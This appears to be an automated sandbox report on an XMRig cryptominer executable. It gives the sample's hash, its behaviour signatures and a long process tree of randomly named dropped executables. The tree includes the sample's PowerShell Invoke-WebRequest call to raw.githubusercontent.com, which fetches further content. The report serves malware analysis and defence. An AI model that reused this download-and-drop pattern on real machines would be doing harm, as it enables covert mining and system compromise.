Malware Analysis Report

2024-11-16 12:03

Sample ID 240612-llqxyszcpa
Target 2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe
SHA256 97d016d0d4b5ff605c07e27c3f8dba76e2932d8314972a52fd00ac8dadaab686
Tags upx miner xmrig execution
Score 10/10

Analysis Overview

score
10/10

SHA256

97d016d0d4b5ff605c07e27c3f8dba76e2932d8314972a52fd00ac8dadaab686

Threat Level: Known bad

The file 2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe was found to be: Known bad.

Malicious Activity Summary

upx miner xmrig execution

XMRig Miner payload

Xmrig family

xmrig

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

UPX packed file

Loads dropped DLL

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Drops file in Windows directory

Unsigned PE

Checks processor information in registry

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Enumerates system info in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-12 09:37

Signatures

XMRig Miner payload

miner

Xmrig family

xmrig

UPX packed file

upx

Unsigned PE


Analysis: behavioral1

Detonation Overview

Submitted

2024-06-12 09:37

Reported

2024-06-12 09:40

Platform

win7-20240611-en

Max time kernel

150s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE


Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A

UPX packed file

upx

Drops file in Windows directory


Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory


Processes

C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "


C:\Windows\System\rxZTZYt.exe

C:\Windows\System\rxZTZYt.exe

C:\Windows\System\azqQshw.exe

C:\Windows\System\azqQshw.exe

C:\Windows\System\dZgJEQy.exe

C:\Windows\System\dZgJEQy.exe

C:\Windows\System\niMYWGM.exe

C:\Windows\System\niMYWGM.exe

C:\Windows\System\IDmayUa.exe

C:\Windows\System\IDmayUa.exe

C:\Windows\System\RiLwHOb.exe

C:\Windows\System\RiLwHOb.exe

C:\Windows\System\OZrfBep.exe

C:\Windows\System\OZrfBep.exe

C:\Windows\System\QoUmUpL.exe

C:\Windows\System\QoUmUpL.exe

C:\Windows\System\JFAeXcn.exe

C:\Windows\System\JFAeXcn.exe

C:\Windows\System\FvlPczt.exe

C:\Windows\System\FvlPczt.exe

C:\Windows\System\utTtVba.exe

C:\Windows\System\utTtVba.exe

C:\Windows\System\VJSogXN.exe

C:\Windows\System\VJSogXN.exe

C:\Windows\System\qhzAIpv.exe

C:\Windows\System\qhzAIpv.exe

C:\Windows\System\JUHiqfl.exe

C:\Windows\System\JUHiqfl.exe

C:\Windows\System\GsAmRHg.exe

C:\Windows\System\GsAmRHg.exe

C:\Windows\System\JjStmKV.exe

C:\Windows\System\JjStmKV.exe

C:\Windows\System\jpmeELt.exe

C:\Windows\System\jpmeELt.exe

C:\Windows\System\QsaRmdl.exe

C:\Windows\System\QsaRmdl.exe

C:\Windows\System\pGcmjHH.exe

C:\Windows\System\pGcmjHH.exe

C:\Windows\System\vIbtFcu.exe

C:\Windows\System\vIbtFcu.exe

C:\Windows\System\rsEMvSx.exe

C:\Windows\System\rsEMvSx.exe

C:\Windows\System\dEeMvZA.exe

C:\Windows\System\dEeMvZA.exe

C:\Windows\System\oeQIVDD.exe

C:\Windows\System\oeQIVDD.exe

C:\Windows\System\kQtiLWz.exe

C:\Windows\System\kQtiLWz.exe

C:\Windows\System\fNudpNJ.exe

C:\Windows\System\fNudpNJ.exe

C:\Windows\System\PRFYwlD.exe

C:\Windows\System\PRFYwlD.exe

C:\Windows\System\UlXNCrw.exe

C:\Windows\System\UlXNCrw.exe

C:\Windows\System\IiIeHQw.exe

C:\Windows\System\IiIeHQw.exe

C:\Windows\System\sMdVhnu.exe

C:\Windows\System\sMdVhnu.exe

C:\Windows\System\CgyculE.exe

C:\Windows\System\CgyculE.exe

C:\Windows\System\uBKuKRf.exe

C:\Windows\System\uBKuKRf.exe

C:\Windows\System\yABPAgh.exe

C:\Windows\System\yABPAgh.exe

C:\Windows\System\ToQeuPY.exe

C:\Windows\System\ToQeuPY.exe

C:\Windows\System\mUxHeyn.exe

C:\Windows\System\mUxHeyn.exe

C:\Windows\System\HexagLM.exe

C:\Windows\System\HexagLM.exe

C:\Windows\System\zkWTvnf.exe

C:\Windows\System\zkWTvnf.exe

C:\Windows\System\EtwMhKY.exe

C:\Windows\System\EtwMhKY.exe

C:\Windows\System\JJTpmJP.exe

C:\Windows\System\JJTpmJP.exe

C:\Windows\System\vjBGwmz.exe

C:\Windows\System\vjBGwmz.exe

C:\Windows\System\YsnAyIi.exe

C:\Windows\System\YsnAyIi.exe

C:\Windows\System\xyoPLqw.exe

C:\Windows\System\xyoPLqw.exe

C:\Windows\System\sixGtZq.exe

C:\Windows\System\sixGtZq.exe

C:\Windows\System\EBxLxUR.exe

C:\Windows\System\EBxLxUR.exe

C:\Windows\System\NAckJeB.exe

C:\Windows\System\NAckJeB.exe

C:\Windows\System\OYxqYsU.exe

C:\Windows\System\OYxqYsU.exe

C:\Windows\System\eZfyRYF.exe

C:\Windows\System\eZfyRYF.exe

C:\Windows\System\dTLWSlj.exe

C:\Windows\System\dTLWSlj.exe

C:\Windows\System\RvTQhEh.exe

C:\Windows\System\RvTQhEh.exe

C:\Windows\System\nlmXdpq.exe

C:\Windows\System\nlmXdpq.exe

C:\Windows\System\cOmMvPP.exe

C:\Windows\System\cOmMvPP.exe

C:\Windows\System\GmUaAMX.exe

C:\Windows\System\GmUaAMX.exe

C:\Windows\System\lkJhzZy.exe

C:\Windows\System\lkJhzZy.exe

C:\Windows\System\NSfpGuJ.exe

C:\Windows\System\NSfpGuJ.exe

C:\Windows\System\yayXnaa.exe

C:\Windows\System\yayXnaa.exe

C:\Windows\System\HGCVhKi.exe

C:\Windows\System\HGCVhKi.exe

C:\Windows\System\bXpGrGe.exe

C:\Windows\System\bXpGrGe.exe

C:\Windows\System\yqwOZtM.exe

C:\Windows\System\yqwOZtM.exe

C:\Windows\System\WxOdMvB.exe

C:\Windows\System\WxOdMvB.exe

C:\Windows\System\oKGLzyX.exe

C:\Windows\System\oKGLzyX.exe

C:\Windows\System\tzfcTrT.exe

C:\Windows\System\tzfcTrT.exe

C:\Windows\System\YHDmUYn.exe

C:\Windows\System\YHDmUYn.exe

C:\Windows\System\uFstXWj.exe

C:\Windows\System\uFstXWj.exe

C:\Windows\System\lxxLFHg.exe

C:\Windows\System\lxxLFHg.exe

C:\Windows\System\NPlHmWV.exe

C:\Windows\System\NPlHmWV.exe

C:\Windows\System\wmWhWZM.exe

C:\Windows\System\wmWhWZM.exe

C:\Windows\System\JUpFpha.exe

C:\Windows\System\JUpFpha.exe

C:\Windows\System\eZmPSoD.exe

C:\Windows\System\eZmPSoD.exe

C:\Windows\System\JrsTvlJ.exe

C:\Windows\System\JrsTvlJ.exe

C:\Windows\System\JAswWNG.exe

C:\Windows\System\JAswWNG.exe

C:\Windows\System\GGatCOq.exe

C:\Windows\System\GGatCOq.exe

C:\Windows\System\LUBsxFd.exe

C:\Windows\System\LUBsxFd.exe

C:\Windows\System\jHabpqF.exe

C:\Windows\System\jHabpqF.exe

C:\Windows\System\JYIZPdX.exe

C:\Windows\System\JYIZPdX.exe

C:\Windows\System\WaeYXVS.exe

C:\Windows\System\WaeYXVS.exe

C:\Windows\System\hOYoDGS.exe

C:\Windows\System\hOYoDGS.exe

C:\Windows\System\jESumRj.exe

C:\Windows\System\jESumRj.exe

C:\Windows\System\PFzHMse.exe

C:\Windows\System\PFzHMse.exe

C:\Windows\System\dAaoHyR.exe

C:\Windows\System\dAaoHyR.exe

C:\Windows\System\uoGEUNZ.exe

C:\Windows\System\uoGEUNZ.exe

C:\Windows\System\AABtObq.exe

C:\Windows\System\AABtObq.exe

C:\Windows\System\VGzVGRm.exe

C:\Windows\System\VGzVGRm.exe

C:\Windows\System\RzmUcCS.exe

C:\Windows\System\RzmUcCS.exe

C:\Windows\System\ObRWLAw.exe

C:\Windows\System\ObRWLAw.exe

C:\Windows\System\fXoNvce.exe

C:\Windows\System\fXoNvce.exe

C:\Windows\System\sqxdSyU.exe

C:\Windows\System\sqxdSyU.exe

C:\Windows\System\DiglSgs.exe

C:\Windows\System\DiglSgs.exe

C:\Windows\System\zmLEtnO.exe

C:\Windows\System\zmLEtnO.exe

C:\Windows\System\qEYlqIi.exe

C:\Windows\System\qEYlqIi.exe

C:\Windows\System\NdbamMD.exe

C:\Windows\System\NdbamMD.exe

C:\Windows\System\CAdSfMR.exe

C:\Windows\System\CAdSfMR.exe

C:\Windows\System\OVtVxRs.exe

C:\Windows\System\OVtVxRs.exe

C:\Windows\System\mflweZm.exe

C:\Windows\System\mflweZm.exe

C:\Windows\System\juFQgBk.exe

C:\Windows\System\juFQgBk.exe

C:\Windows\System\JtnANMB.exe

C:\Windows\System\JtnANMB.exe

C:\Windows\System\oxrhMwC.exe

C:\Windows\System\oxrhMwC.exe

C:\Windows\System\BYgKoPA.exe

C:\Windows\System\BYgKoPA.exe

C:\Windows\System\MffFVTa.exe

C:\Windows\System\MffFVTa.exe

C:\Windows\System\vHvTyTZ.exe

C:\Windows\System\vHvTyTZ.exe

C:\Windows\System\SCKqgvM.exe

C:\Windows\System\SCKqgvM.exe

C:\Windows\System\sqtgrPU.exe

C:\Windows\System\sqtgrPU.exe

C:\Windows\System\UfCPOGh.exe

C:\Windows\System\UfCPOGh.exe

C:\Windows\System\RKeWafg.exe

C:\Windows\System\RKeWafg.exe

C:\Windows\System\mbrSvKI.exe

C:\Windows\System\mbrSvKI.exe

C:\Windows\System\oTjnZRb.exe

C:\Windows\System\oTjnZRb.exe

C:\Windows\System\ftLgqFc.exe

C:\Windows\System\ftLgqFc.exe

C:\Windows\System\GnDsNbB.exe

C:\Windows\System\GnDsNbB.exe

C:\Windows\System\KkumsYv.exe

C:\Windows\System\KkumsYv.exe

C:\Windows\System\QtFzYjl.exe

C:\Windows\System\QtFzYjl.exe

C:\Windows\System\sbbqizm.exe

C:\Windows\System\sbbqizm.exe

C:\Windows\System\nNEOhnc.exe

C:\Windows\System\nNEOhnc.exe

C:\Windows\System\SeFQuTF.exe

C:\Windows\System\SeFQuTF.exe

C:\Windows\System\fCKQurn.exe

C:\Windows\System\fCKQurn.exe

C:\Windows\System\hMwjPKW.exe

C:\Windows\System\hMwjPKW.exe

C:\Windows\System\IhpKRCo.exe

C:\Windows\System\IhpKRCo.exe

C:\Windows\System\pTrrjpQ.exe

C:\Windows\System\pTrrjpQ.exe

C:\Windows\System\YrZxRGe.exe

C:\Windows\System\YrZxRGe.exe

C:\Windows\System\dRwyeoY.exe

C:\Windows\System\dRwyeoY.exe

C:\Windows\System\LukMjXs.exe

C:\Windows\System\LukMjXs.exe

C:\Windows\System\gekANUB.exe

C:\Windows\System\gekANUB.exe

C:\Windows\System\mXfLYos.exe

C:\Windows\System\mXfLYos.exe

C:\Windows\System\SGDalFj.exe

C:\Windows\System\SGDalFj.exe

C:\Windows\System\ZmDEEtu.exe

C:\Windows\System\ZmDEEtu.exe

C:\Windows\System\ZgkvETI.exe

C:\Windows\System\ZgkvETI.exe

C:\Windows\System\TKSXEfz.exe

C:\Windows\System\TKSXEfz.exe

C:\Windows\System\YNYqyTg.exe

C:\Windows\System\YNYqyTg.exe

C:\Windows\System\XRHfdji.exe

C:\Windows\System\XRHfdji.exe

C:\Windows\System\nlbHVtE.exe

C:\Windows\System\nlbHVtE.exe

C:\Windows\System\EPTOuod.exe

C:\Windows\System\EPTOuod.exe

C:\Windows\System\ZjpdDFw.exe

C:\Windows\System\ZjpdDFw.exe

C:\Windows\System\pniIVnU.exe

C:\Windows\System\pniIVnU.exe

C:\Windows\System\bIdgNMG.exe

C:\Windows\System\bIdgNMG.exe

C:\Windows\System\QtSrbeJ.exe

C:\Windows\System\QtSrbeJ.exe

C:\Windows\System\szfOAbN.exe

C:\Windows\System\szfOAbN.exe

C:\Windows\System\qZxnaEI.exe

C:\Windows\System\qZxnaEI.exe

C:\Windows\System\VjODgqK.exe

C:\Windows\System\VjODgqK.exe

C:\Windows\System\kesoCAl.exe

C:\Windows\System\kesoCAl.exe

C:\Windows\System\GbpBCNS.exe

C:\Windows\System\GbpBCNS.exe

C:\Windows\System\VlUGZLe.exe

C:\Windows\System\VlUGZLe.exe

C:\Windows\System\buFLftg.exe

C:\Windows\System\buFLftg.exe

C:\Windows\System\XTAOqKd.exe

C:\Windows\System\XTAOqKd.exe

C:\Windows\System\mfqRcDf.exe

C:\Windows\System\mfqRcDf.exe

C:\Windows\System\XvgeGOs.exe

C:\Windows\System\XvgeGOs.exe

C:\Windows\System\UepHZOB.exe

C:\Windows\System\UepHZOB.exe

C:\Windows\System\uVJEUtB.exe

C:\Windows\System\uVJEUtB.exe

C:\Windows\System\ffSTapQ.exe

C:\Windows\System\ffSTapQ.exe

C:\Windows\System\obIRhyb.exe

C:\Windows\System\obIRhyb.exe

C:\Windows\System\zyWNMVj.exe

C:\Windows\System\zyWNMVj.exe

C:\Windows\System\gGnQoXC.exe

C:\Windows\System\gGnQoXC.exe

C:\Windows\System\hXPifxs.exe

C:\Windows\System\hXPifxs.exe

C:\Windows\System\vLutCff.exe

C:\Windows\System\vLutCff.exe

C:\Windows\System\HztdlpG.exe

C:\Windows\System\HztdlpG.exe

C:\Windows\System\HjssyrH.exe

C:\Windows\System\HjssyrH.exe

C:\Windows\System\IhNJKJq.exe

C:\Windows\System\IhNJKJq.exe

C:\Windows\System\lrMqQWw.exe

C:\Windows\System\lrMqQWw.exe

C:\Windows\System\qBbZSgi.exe

C:\Windows\System\qBbZSgi.exe

C:\Windows\System\xApHckp.exe

C:\Windows\System\xApHckp.exe

C:\Windows\System\IoNidUw.exe

C:\Windows\System\IoNidUw.exe

C:\Windows\System\HVowqdQ.exe

C:\Windows\System\HVowqdQ.exe

C:\Windows\System\HjCWtSw.exe

C:\Windows\System\HjCWtSw.exe

C:\Windows\System\YmapBfl.exe

C:\Windows\System\YmapBfl.exe

C:\Windows\System\eWztjmA.exe

C:\Windows\System\eWztjmA.exe

C:\Windows\System\OJvBOej.exe

C:\Windows\System\OJvBOej.exe

C:\Windows\System\tsHtOca.exe

C:\Windows\System\tsHtOca.exe

C:\Windows\System\hlTjzZJ.exe

C:\Windows\System\hlTjzZJ.exe

C:\Windows\System\TDFUgNB.exe

C:\Windows\System\TDFUgNB.exe

C:\Windows\System\UDFXLzC.exe

C:\Windows\System\UDFXLzC.exe

C:\Windows\System\zGnIuYB.exe

C:\Windows\System\zGnIuYB.exe

C:\Windows\System\bUuSxjH.exe

C:\Windows\System\bUuSxjH.exe

C:\Windows\System\GJcLBqb.exe

C:\Windows\System\GJcLBqb.exe

C:\Windows\System\tAzLdQL.exe

C:\Windows\System\tAzLdQL.exe

C:\Windows\System\cwrNICO.exe

C:\Windows\System\cwrNICO.exe

C:\Windows\System\IjsQSHV.exe

C:\Windows\System\IjsQSHV.exe

C:\Windows\System\NdhveGe.exe

C:\Windows\System\NdhveGe.exe

C:\Windows\System\TLUiCyZ.exe

C:\Windows\System\TLUiCyZ.exe

C:\Windows\System\cmtMdXc.exe

C:\Windows\System\cmtMdXc.exe

C:\Windows\System\VoWrIDb.exe

C:\Windows\System\VoWrIDb.exe

C:\Windows\System\EoYtdWW.exe

C:\Windows\System\EoYtdWW.exe

C:\Windows\System\BNOOVzV.exe

C:\Windows\System\BNOOVzV.exe

C:\Windows\System\ntCsPqO.exe

C:\Windows\System\ntCsPqO.exe

C:\Windows\System\LniCBLi.exe

C:\Windows\System\LniCBLi.exe

C:\Windows\System\VnSHDmi.exe

C:\Windows\System\VnSHDmi.exe

C:\Windows\System\vMOMzUk.exe

C:\Windows\System\vMOMzUk.exe

C:\Windows\System\brFkBIF.exe

C:\Windows\System\brFkBIF.exe

C:\Windows\System\pBJoTbP.exe

C:\Windows\System\pBJoTbP.exe

C:\Windows\System\cSoHBQB.exe

C:\Windows\System\cSoHBQB.exe

C:\Windows\System\WcPcTjb.exe

C:\Windows\System\WcPcTjb.exe

C:\Windows\System\RwOqtRD.exe

C:\Windows\System\RwOqtRD.exe

C:\Windows\System\uCDvvhL.exe

C:\Windows\System\uCDvvhL.exe

C:\Windows\System\HKWuyRP.exe

C:\Windows\System\HKWuyRP.exe

C:\Windows\System\PcqFcjc.exe

C:\Windows\System\PcqFcjc.exe

C:\Windows\System\SorRIeZ.exe

C:\Windows\System\SorRIeZ.exe

C:\Windows\System\ajigECL.exe

C:\Windows\System\ajigECL.exe

C:\Windows\System\PFbiOAo.exe

C:\Windows\System\PFbiOAo.exe

C:\Windows\System\GOOZIwi.exe

C:\Windows\System\GOOZIwi.exe

C:\Windows\System\rOgdqZH.exe

C:\Windows\System\rOgdqZH.exe

C:\Windows\System\EUKAfqS.exe

C:\Windows\System\EUKAfqS.exe

C:\Windows\System\bIhYOBu.exe

C:\Windows\System\bIhYOBu.exe

C:\Windows\System\YXBIURv.exe

C:\Windows\System\YXBIURv.exe

C:\Windows\System\UcdodZH.exe

C:\Windows\System\UcdodZH.exe

C:\Windows\System\JniZxuE.exe

C:\Windows\System\JniZxuE.exe

C:\Windows\System\sLJSkEi.exe

C:\Windows\System\sLJSkEi.exe

C:\Windows\System\khRylKL.exe

C:\Windows\System\khRylKL.exe

C:\Windows\System\oQGtLod.exe

C:\Windows\System\oQGtLod.exe

C:\Windows\System\QfFUqKc.exe

C:\Windows\System\QfFUqKc.exe

C:\Windows\System\ZsWHanD.exe

C:\Windows\System\ZsWHanD.exe

C:\Windows\System\htLEFWk.exe

C:\Windows\System\htLEFWk.exe

C:\Windows\System\aMSICiy.exe

C:\Windows\System\aMSICiy.exe

C:\Windows\System\jfFobLe.exe

C:\Windows\System\jfFobLe.exe

C:\Windows\System\XivJFge.exe

C:\Windows\System\XivJFge.exe

C:\Windows\System\jbAkJpA.exe

C:\Windows\System\jbAkJpA.exe

C:\Windows\System\GwrMnTl.exe

C:\Windows\System\GwrMnTl.exe

C:\Windows\System\CazYdte.exe

C:\Windows\System\CazYdte.exe

C:\Windows\System\MOZjkGe.exe

C:\Windows\System\MOZjkGe.exe

C:\Windows\System\HGklODU.exe

C:\Windows\System\HGklODU.exe

C:\Windows\System\hIMwIye.exe

C:\Windows\System\hIMwIye.exe

C:\Windows\System\EJsiXSm.exe

C:\Windows\System\EJsiXSm.exe

C:\Windows\System\AGVNViB.exe

C:\Windows\System\AGVNViB.exe

C:\Windows\System\WXUvxvG.exe

C:\Windows\System\WXUvxvG.exe

C:\Windows\System\SWRMEcC.exe

C:\Windows\System\SWRMEcC.exe

C:\Windows\System\hODIuuj.exe

C:\Windows\System\hODIuuj.exe

C:\Windows\System\RjxcPjS.exe

C:\Windows\System\RjxcPjS.exe

C:\Windows\System\lDxTgSt.exe

C:\Windows\System\lDxTgSt.exe

C:\Windows\System\uhnkyij.exe

C:\Windows\System\uhnkyij.exe

C:\Windows\System\WitrLQs.exe

C:\Windows\System\WitrLQs.exe

C:\Windows\System\tzpbAMe.exe

C:\Windows\System\tzpbAMe.exe

C:\Windows\System\aNegpwh.exe

C:\Windows\System\aNegpwh.exe

C:\Windows\System\ydIMxdO.exe

C:\Windows\System\ydIMxdO.exe

C:\Windows\System\cUSPqmy.exe

C:\Windows\System\cUSPqmy.exe

C:\Windows\System\iOwCjWj.exe

C:\Windows\System\iOwCjWj.exe

C:\Windows\System\LOkstvD.exe

C:\Windows\System\LOkstvD.exe

C:\Windows\System\hPljbFd.exe

C:\Windows\System\hPljbFd.exe

C:\Windows\System\pUywiFM.exe

C:\Windows\System\pUywiFM.exe

C:\Windows\System\ndvvTOn.exe

C:\Windows\System\ndvvTOn.exe

C:\Windows\System\xSMrnra.exe

C:\Windows\System\xSMrnra.exe

C:\Windows\System\lMQjVAQ.exe

C:\Windows\System\lMQjVAQ.exe

C:\Windows\System\edqqjut.exe

C:\Windows\System\edqqjut.exe

C:\Windows\System\yZHKSPB.exe

C:\Windows\System\yZHKSPB.exe

C:\Windows\System\ehptMvt.exe

C:\Windows\System\ehptMvt.exe

C:\Windows\System\fiUarqr.exe

C:\Windows\System\fiUarqr.exe

C:\Windows\System\OMOKDEi.exe

C:\Windows\System\OMOKDEi.exe

C:\Windows\System\MUGMWwW.exe

C:\Windows\System\MUGMWwW.exe

C:\Windows\System\zqBkZPq.exe

C:\Windows\System\zqBkZPq.exe

C:\Windows\System\VHsdcJH.exe

C:\Windows\System\VHsdcJH.exe

C:\Windows\System\QXCJFpK.exe

C:\Windows\System\QXCJFpK.exe

C:\Windows\System\YITHKhB.exe

C:\Windows\System\YITHKhB.exe

C:\Windows\System\bxAjIfC.exe

C:\Windows\System\bxAjIfC.exe

C:\Windows\System\HxTWbmV.exe

C:\Windows\System\HxTWbmV.exe

C:\Windows\System\jaTMybR.exe

C:\Windows\System\jaTMybR.exe

C:\Windows\System\XYIuwmY.exe

C:\Windows\System\XYIuwmY.exe

C:\Windows\System\fiEiZTz.exe

C:\Windows\System\fiEiZTz.exe

C:\Windows\System\tfAFzXQ.exe

C:\Windows\System\tfAFzXQ.exe

C:\Windows\System\fCqFjHQ.exe

C:\Windows\System\fCqFjHQ.exe

C:\Windows\System\RlUSqFU.exe

C:\Windows\System\RlUSqFU.exe

C:\Windows\System\tSBLNtk.exe

C:\Windows\System\tSBLNtk.exe

C:\Windows\System\fxtgiWp.exe

C:\Windows\System\fxtgiWp.exe

C:\Windows\System\EpxiKhX.exe

C:\Windows\System\EpxiKhX.exe

C:\Windows\System\HMmhZBt.exe

C:\Windows\System\HMmhZBt.exe

C:\Windows\System\MGznbHA.exe

C:\Windows\System\MGznbHA.exe

C:\Windows\System\eGfqXTe.exe

C:\Windows\System\eGfqXTe.exe

C:\Windows\System\lXtsWgb.exe

C:\Windows\System\lXtsWgb.exe

C:\Windows\System\MlAZWoR.exe

C:\Windows\System\MlAZWoR.exe

C:\Windows\System\CkggLgF.exe

C:\Windows\System\CkggLgF.exe

C:\Windows\System\Ewqebbw.exe

C:\Windows\System\Ewqebbw.exe

C:\Windows\System\gGYhZEg.exe

C:\Windows\System\gGYhZEg.exe

C:\Windows\System\TbvSOdu.exe

C:\Windows\System\TbvSOdu.exe

C:\Windows\System\JVwrFtM.exe

C:\Windows\System\JVwrFtM.exe

C:\Windows\System\NVrXNdb.exe

C:\Windows\System\NVrXNdb.exe

C:\Windows\System\CwzvJQS.exe

C:\Windows\System\CwzvJQS.exe

C:\Windows\System\HUmsdUg.exe

C:\Windows\System\HUmsdUg.exe

C:\Windows\System\hamhGSP.exe

C:\Windows\System\hamhGSP.exe

C:\Windows\System\muKzBgm.exe

C:\Windows\System\muKzBgm.exe

C:\Windows\System\QhxXaqa.exe

C:\Windows\System\QhxXaqa.exe

C:\Windows\System\UAWScuY.exe

C:\Windows\System\UAWScuY.exe

C:\Windows\System\QAGVAmd.exe

C:\Windows\System\QAGVAmd.exe

C:\Windows\System\llbjbGA.exe

C:\Windows\System\llbjbGA.exe

C:\Windows\System\xHWKwlO.exe

C:\Windows\System\xHWKwlO.exe

C:\Windows\System\asCzHTH.exe

C:\Windows\System\asCzHTH.exe

C:\Windows\System\eQKsUHX.exe

C:\Windows\System\eQKsUHX.exe

C:\Windows\System\buylySe.exe

C:\Windows\System\buylySe.exe

C:\Windows\System\TZQgdWf.exe

C:\Windows\System\TZQgdWf.exe

C:\Windows\System\FEcrMlk.exe

C:\Windows\System\FEcrMlk.exe

C:\Windows\System\sMvGhuh.exe

C:\Windows\System\sMvGhuh.exe

C:\Windows\System\VrbPLpI.exe

C:\Windows\System\VrbPLpI.exe

C:\Windows\System\OVHzyfl.exe

C:\Windows\System\OVHzyfl.exe

C:\Windows\System\cCVFbXm.exe

C:\Windows\System\cCVFbXm.exe

C:\Windows\System\BNiLjAc.exe

C:\Windows\System\BNiLjAc.exe

C:\Windows\System\fgCkBxd.exe

C:\Windows\System\fgCkBxd.exe

C:\Windows\System\riARWlo.exe

C:\Windows\System\riARWlo.exe

C:\Windows\System\RICbdZM.exe

C:\Windows\System\RICbdZM.exe

C:\Windows\System\SNSJWFD.exe

C:\Windows\System\SNSJWFD.exe

C:\Windows\System\jFhDpTY.exe

C:\Windows\System\jFhDpTY.exe

C:\Windows\System\LzLRRWX.exe

C:\Windows\System\LzLRRWX.exe

C:\Windows\System\TMifPTX.exe

C:\Windows\System\TMifPTX.exe

C:\Windows\System\YsQcdbl.exe

C:\Windows\System\YsQcdbl.exe

C:\Windows\System\zsFQMgC.exe

C:\Windows\System\zsFQMgC.exe

C:\Windows\System\CnzatoL.exe

C:\Windows\System\CnzatoL.exe

C:\Windows\System\cCUugNX.exe

C:\Windows\System\cCUugNX.exe

C:\Windows\System\LJFaBZh.exe

C:\Windows\System\LJFaBZh.exe

C:\Windows\System\UyFxbaD.exe

C:\Windows\System\UyFxbaD.exe

C:\Windows\System\sAtCrXy.exe

C:\Windows\System\sAtCrXy.exe

C:\Windows\System\hpZaEwl.exe

C:\Windows\System\hpZaEwl.exe

C:\Windows\System\xQTgPwC.exe

C:\Windows\System\xQTgPwC.exe

C:\Windows\System\zzVxYgJ.exe

C:\Windows\System\zzVxYgJ.exe

C:\Windows\System\BHyJoRy.exe

C:\Windows\System\BHyJoRy.exe

C:\Windows\System\uGChmFy.exe

C:\Windows\System\uGChmFy.exe

C:\Windows\System\yfqrjFH.exe

C:\Windows\System\yfqrjFH.exe

C:\Windows\System\RXYmeoF.exe

C:\Windows\System\RXYmeoF.exe

C:\Windows\System\WEcWwza.exe

C:\Windows\System\WEcWwza.exe

C:\Windows\System\KvlfNAb.exe

C:\Windows\System\KvlfNAb.exe

C:\Windows\System\hMbDXdu.exe

C:\Windows\System\hMbDXdu.exe

C:\Windows\System\QXwZIDN.exe

C:\Windows\System\QXwZIDN.exe

C:\Windows\System\QxtUbPt.exe

C:\Windows\System\QxtUbPt.exe

C:\Windows\System\XWBzVaT.exe

C:\Windows\System\XWBzVaT.exe

C:\Windows\System\udAqjhg.exe

C:\Windows\System\udAqjhg.exe

C:\Windows\System\HxeoruX.exe

C:\Windows\System\HxeoruX.exe

C:\Windows\System\hTnIprc.exe

C:\Windows\System\hTnIprc.exe

C:\Windows\System\GHaFsBH.exe

C:\Windows\System\GHaFsBH.exe

C:\Windows\System\DLUwOfq.exe

C:\Windows\System\DLUwOfq.exe

C:\Windows\System\cOdVrsy.exe

C:\Windows\System\cOdVrsy.exe

C:\Windows\System\xtIPqYh.exe

C:\Windows\System\xtIPqYh.exe

C:\Windows\System\UbstDcx.exe

C:\Windows\System\UbstDcx.exe

C:\Windows\System\IKnacRG.exe

C:\Windows\System\IKnacRG.exe

C:\Windows\System\FFWatFH.exe

C:\Windows\System\FFWatFH.exe

C:\Windows\System\rfZNsth.exe

C:\Windows\System\rfZNsth.exe

C:\Windows\System\pPHWiPi.exe

C:\Windows\System\pPHWiPi.exe

C:\Windows\System\svrRLqA.exe

C:\Windows\System\svrRLqA.exe

C:\Windows\System\mqCyjMR.exe

C:\Windows\System\mqCyjMR.exe

C:\Windows\System\zYKdGQL.exe

C:\Windows\System\zYKdGQL.exe

C:\Windows\System\HoIzaJy.exe

C:\Windows\System\HoIzaJy.exe

C:\Windows\System\HOxyJKd.exe

C:\Windows\System\HOxyJKd.exe

C:\Windows\System\ssFcYxM.exe

C:\Windows\System\ssFcYxM.exe

C:\Windows\System\xNsETYR.exe

C:\Windows\System\xNsETYR.exe

C:\Windows\System\wfeClhk.exe

C:\Windows\System\wfeClhk.exe

C:\Windows\System\lNqOzHj.exe

C:\Windows\System\lNqOzHj.exe

C:\Windows\System\iJgHktv.exe

C:\Windows\System\iJgHktv.exe

C:\Windows\System\zVtpbmP.exe

C:\Windows\System\zVtpbmP.exe

C:\Windows\System\SEXXOWP.exe

C:\Windows\System\SEXXOWP.exe

C:\Windows\System\ZdarKpm.exe

C:\Windows\System\ZdarKpm.exe

C:\Windows\System\bdNRTVW.exe

C:\Windows\System\bdNRTVW.exe

C:\Windows\System\GEPdXUP.exe

C:\Windows\System\GEPdXUP.exe

C:\Windows\System\IcsfnQZ.exe

C:\Windows\System\IcsfnQZ.exe

C:\Windows\System\AtZrIQJ.exe

C:\Windows\System\AtZrIQJ.exe

C:\Windows\System\vhCPDRi.exe

C:\Windows\System\vhCPDRi.exe

C:\Windows\System\GoxyEem.exe

